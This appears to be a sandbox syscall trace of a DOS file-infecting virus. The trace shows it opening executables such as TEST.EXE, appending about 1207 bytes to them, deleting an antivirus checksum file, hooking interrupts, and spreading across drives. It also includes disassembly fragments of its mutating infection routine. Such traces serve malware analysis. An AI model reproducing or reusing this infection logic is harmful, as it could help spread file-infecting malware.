2018-12-25T12:23:31.335057888Z 67 PC: 155da | Get or set file attributes
2018-12-25T12:23:31.346591098Z 79 PC: 1541f | Find next file
2018-12-25T12:23:31.349303351Z 59 PC: 152c0 | Change current directory
2018-12-25T12:23:31.353655099Z 14 PC: 151d5 | Set default drive (Drive = 'C')
2018-12-25T12:23:31.356088676Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:31.357492302Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:31.36301696Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:31.368044629Z 59 PC: 151e0 | Change current directory
2018-12-25T12:23:31.374169987Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:31.375616714Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:31.386180495Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:31.392664906Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.046836731Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.054854329Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.056882929Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.063493099Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.065547401Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.068926292Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.071365661Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.073872766Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.08128472Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.083970321Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.09385303Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.097423609Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.100388503Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.101782186Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.104046703Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.107384372Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.117419177Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.123930417Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.125383207Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.132060034Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.142374315Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.146573465Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.152577875Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.163233617Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.170220859Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.171666649Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.177681874Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.180296912Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.182533731Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.185403368Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.187557508Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.1934173Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.196139967Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.496683946Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.499478842Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.504232306Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.505668691Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.506854713Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.509510726Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.513671218Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.517466179Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.519195378Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.524592962Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.531875785Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.534653622Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.538374372Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.544884293Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.550377334Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.551502372Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.556010719Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.558161767Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.560551005Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.562279106Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.564384143Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.568477783Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.570098857Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.576431673Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.577993298Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.580111477Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.581758085Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.582800673Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.584870503Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.589162005Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.593153176Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.594224609Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.599491977Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.605316048Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.607223013Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.6120251Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.618715396Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.622900496Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.624468817Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.6281383Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.62948109Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.631499264Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.63307135Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.63450785Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.639208581Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.640823056Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.646040172Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.648079925Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.650300298Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.651412877Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.65296593Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.654957956Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.658658421Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.663297331Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.66438845Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.668863276Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.675162167Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.677305065Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.681481271Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.688038416Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.69231319Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.693381754Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.697366999Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.698565666Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.700129149Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.702217635Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.703724208Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.707548243Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.709715132Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.714500963Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.726602044Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.729768678Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.731105207Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.732299086Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.735957315Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.742062215Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.74829115Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.749928574Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.756096958Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.764997061Z 14 PC: 151e9 | Set default drive (Drive = 'D')
2018-12-25T12:23:32.767425705Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.771308674Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.775504566Z 14 PC: 151f2 | Set default drive (Drive = 'E')
2018-12-25T12:23:32.777722612Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.781521763Z 14 PC: 15218 | Set default drive (Drive = 'A')
2018-12-25T12:23:32.783113616Z 59 PC: 15220 | Change current directory
2018-12-25T12:23:32.787755764Z 44 PC: 1523c | Get time 0x1523c: cmp cl, 5
0x1523f: jne 0x15244
0x15241: call 0x1534a
0x15244: cmp cl, 0xd
0x15247: jne 0x1524c
0x15249: call 0x15359
0x1524c: cmp cl, 0x1e
0x1524f: jne 0x15258
0x15251: lea dx, word ptr [bp + 0x290]
0x15255: call 0x15330
0x15258: cmp cl, 0x28
0x1525b: jne 0x15264
0x1525d: lea dx, word ptr [bp + 0x290]
0x15261: call 0x15330
0x15264: cmp cl, 0x32
0x15267: jne 0x15270
0x15269: lea dx, word ptr [bp + 0x2c7]
0x1526d: call 0x15330
0x15270: lea si, word ptr [bp + 0x195]
0x15274: lea di, word ptr [bp + 0x18d]
2018-12-25T12:23:32.789835431Z 78 PC: 15337 | Find first file
2018-12-25T12:23:32.795680257Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.806037246Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.841627083Z 53 PC: 14fba | Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:32.8426722Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.844153016Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.845311509Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.846519717Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.848224435Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.849386003Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.850384499Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.851864769Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.852799663Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.853700222Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.855154411Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.856347626Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.857240629Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.858815491Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.859701051Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.86054653Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.86199774Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.862918655Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.863808897Z 37 PC: 14fcf | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:32.865123258Z 37 PC: 14fd7 | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:23:32.865949459Z 37 PC: 14fdf | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:23:32.866756739Z 37 PC: 14fe7 | Set interrupt vector (Interrupt = '63' AKA 'Read file or device')
2018-12-25T12:23:32.868442405Z 68 PC: 15eab | I/O control for devices (Set for = '� ��O�Э:E�t��ҭ3ɬ� �u��ŝ]_^ZY[�P�/��t�\�ЭXâЭX�SQRWV�������6έ�6̭�6ʭ2ɬ �t:�t��t�����2ɪ���6έ��3����t!�Э �u:E�t��� �u�����}��')
2018-12-25T12:23:32.990635829Z 64 PC: 1563b | Write file or device (Write 0 bytes on handle 1)
2018-12-25T12:23:32.992513302Z 37 PC: 15111 | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:32.994868052Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.996209728Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.997613511Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.999762868Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.000904067Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.002006682Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.003926194Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.005003376Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.006138299Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.00811215Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.00915693Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.010190494Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.01231423Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.01343326Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.014538989Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.016360217Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.017411323Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.01844265Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.020068527Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.022010349Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.023959753Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.026506255Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.029181639Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.031611316Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.034277578Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.036278821Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.038230911Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.040533582Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.042450237Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.04453058Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.047038258Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.048985088Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.051909328Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.054785472Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.057074629Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.059919259Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.061971333Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.064032475Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.066551891Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.068735221Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.071209918Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.074264324Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.076945859Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.07946393Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.0831915Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.08533908Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.087627965Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.090770826Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.093407433Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.095739925Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.098346399Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.101748511Z 76 PC: 15150 | Terminate with return code (Return code = '200')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":50,"Second":0,"TimeBased":true,"OriginalID":9667,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:30.275118292Z 25 PC: 15198 | Get default drive
2018-12-25T12:23:30.276762239Z 71 PC: 151a7 | Get current directory
2018-12-25T12:23:30.279513987Z 26 PC: 153fd | Set disk transfer address
2018-12-25T12:23:30.280467989Z 78 PC: 15408 | Find first file
2018-12-25T12:23:30.286661102Z 67 PC: 1542b | Get or set file attributes
2018-12-25T12:23:30.292430414Z 67 PC: 15433 | Get or set file attributes
2018-12-25T12:23:31.23105339Z 61 PC: 15438 | Open file (Filename = 'TEST.EXE')
2018-12-25T12:23:31.243418753Z 87 PC: 1543e | Get or set file date and time
2018-12-25T12:23:31.245078357Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:23:31.252071456Z 66 PC: 154a6 | Move file pointer
2018-12-25T12:23:31.254302359Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8
0x1550e: lea di, word ptr [bp + 0x555]
0x15512: inc di
0x15513: shl dx, 1
0x15515: jb 0x1551e
0x15517: mov word ptr [di], 0xf8
0x1551b: jmp 0x15522
0x1551d: nop
0x1551e: mov word ptr [di], 0xfc
0x15522: loop 0x15512
0x15524: mov ah, 0x2c
0x15526: int 0x21
0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
2018-12-25T12:23:31.256988104Z 44 PC: 15528 | Get time 0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
2018-12-25T12:23:31.25945431Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
0x15555: mov ah, 0x2c
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-25T12:23:31.262675331Z 64 PC: 15550 | Write file or device (Write 6 bytes on handle 5)
2018-12-25T12:23:31.297156533Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov ax, 0x4202
0x15581: xor cx, cx
0x15583: xor dx, dx
0x15585: int 0x21
0x15587: push ax
0x15588: mov cl, 9
2018-12-25T12:23:31.300363095Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
2018-12-25T12:23:31.322219719Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: scasb al, byte ptr es:[di]
0x1557f: add byte ptr [si + 0x31], dl
0x15582: fbstp dword ptr [bx + di]
2018-12-25T12:23:31.326192561Z 64 PC: 1557b | Write file or device (Write 28 bytes on handle 5)
2018-12-25T12:23:31.32919515Z 66 PC: 15587 | Move file pointer
2018-12-25T12:23:31.330753431Z 66 PC: 155a8 | Move file pointer
2018-12-25T12:23:31.333408844Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-25T12:23:31.336416284Z 67 PC: 15345 | Get or set file attributes
2018-12-25T12:23:31.344651442Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-25T12:23:31.351830014Z 87 PC: 155cc | Get or set file date and time
2018-12-25T12:23:31.354257914Z 62 PC: 155d0 | Close file
2018-12-25T12:23:31.361769441Z 67 PC: 155da | Get or set file attributes
2018-12-25T12:23:31.371180512Z 79 PC: 1541f | Find next file
2018-12-25T12:23:31.372879518Z 59 PC: 152c0 | Change current directory
2018-12-25T12:23:31.378762812Z 14 PC: 151d5 | Set default drive (Drive = 'C')
2018-12-25T12:23:31.382217254Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:31.383210872Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:31.386854769Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:31.391021827Z 59 PC: 151e0 | Change current directory
2018-12-25T12:23:31.394783944Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:31.395679427Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:31.404687786Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:31.409643274Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.046519713Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.054404529Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.056512759Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.062244749Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.06420178Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.067878356Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.07046629Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.072509287Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.077020908Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.08001551Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.086521783Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.088782639Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.091103052Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.092224237Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.093922171Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.095998079Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.102680255Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.108079162Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.109660712Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.114544963Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.124727564Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.129135432Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.139671861Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.151522012Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.158369989Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.16004152Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.166862871Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.168391767Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.170550413Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.178694987Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.180901551Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.187047761Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.190046751Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.496983932Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.499430589Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.503754215Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.505880899Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.507644438Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.511538871Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.517799646Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.525112806Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.528126399Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.535276247Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.544938208Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.549827448Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.555868972Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.565625875Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.573257514Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.574986445Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.58076506Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.583205804Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.58548836Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.587777389Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.5911654Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.597170917Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.599660094Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.608761928Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.610947042Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.613758973Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.615794435Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.617175213Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.619809788Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.626010669Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.631905597Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.633658406Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.64081405Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.650858895Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.654048216Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.66068412Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.670442625Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.676814979Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.678189794Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.68381676Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.685217686Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.687440451Z 44 PC: 15528 | Get time (See above)
